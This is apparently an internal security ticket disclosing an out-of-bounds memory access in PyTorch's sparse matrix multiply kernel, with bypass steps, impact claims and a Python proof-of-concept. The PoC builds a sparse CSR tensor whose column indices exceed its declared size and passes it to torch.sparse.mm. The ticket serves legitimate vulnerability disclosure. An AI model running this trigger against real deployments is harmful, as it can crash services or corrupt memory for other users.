Uploaded image for project: 'AI Platform Core Components'
  1. AI Platform Core Components
  2. AIPCC-7711

[Security] Advanced Out-of-Bounds Bypassing Dimension Checks in SpmmReduceKernel.cpp

XMLWordPrintable

    • False
    • Hide

      None

      Show
      None
    • False

      Vulnerability Type: Improper Validation of Array Index (CWE-129, CWE-823)

      Location:

      • File: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp
      • Line: 60

      Details:
      Basic dimension mismatches are caught by runtime checks that verify sparse.size(1) == dense.size(0). However, the vulnerability exists in a more subtle form. The check validates tensor DIMENSIONS but not the VALUES within col_indices.

      Bypass method:
      1. Declare sparse tensor with size matching dense tensor dimensions
      2. Insert col_indices values that exceed the declared size
      3. The dimension check passes: sparse.size(1) == dense.size(0)
      4. But col_indices contains values >= sparse.size(1)

      There is no validation that col_indices.max() < sparse.size(1). This means attackers can create a sparse tensor with declared size (M, N) but col_indices containing values >= N. When this sparse tensor is multiplied with a dense tensor of size (N, K), the dimension check passes, but pointer arithmetic uses the actual col_indices values, causing OOB access.

      Impact:

      • Information disclosure via OOB reads
      • Memory corruption via OOB writes
      • Denial of service via segmentation faults
      • Potential code execution with heap manipulation
      • Can bypass basic dimension validation
      • Exploitable through post-creation tensor modification

      Exploit Code (first 50 lines):

      #!/usr/bin/env python3
import torch
import sys
import warnings

def exploit_advanced_oob():
    print("ADVANCED CVE Exploit: Bypassing Validation in torch.sparse.mm()")
    print("Location: aten/src/ATen/native/cpu/SpmmReduceKernel.cpp:60")
    
    warnings.filterwarnings('ignore')

    # Try to use unsafe tensor creation
    if hasattr(torch, '_sparse_csr_tensor_unsafe'):
        crow_indices = torch.tensor([0, 2, 4], dtype=torch.int64)
        col_indices = torch.tensor([0, 100, 1, 200], dtype=torch.int64)
        values = torch.tensor([1.0, 2.0, 3.0, 4.0], dtype=torch.float32)

        sparse_matrix = torch._sparse_csr_tensor_unsafe(
            crow_indices=crow_indices,
            col_indices=col_indices,
            values=values,
            size=(2, 10),
            dtype=torch.float32,
            device='cpu'
        )

        dense_matrix = torch.randn(10, 5, dtype=torch.float32, device='cpu')
        result = torch.sparse.mm(sparse_matrix, dense_matrix, reduce='sum')

      Severity: High
      CVSS Score: 8.0

      Source File: /pytorch/results/exploit_cve3_advanced_oob.py

              Unassigned Unassigned
              rh-ee-rpunia Riya Punia
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

                Created:
                Updated:
                Resolved: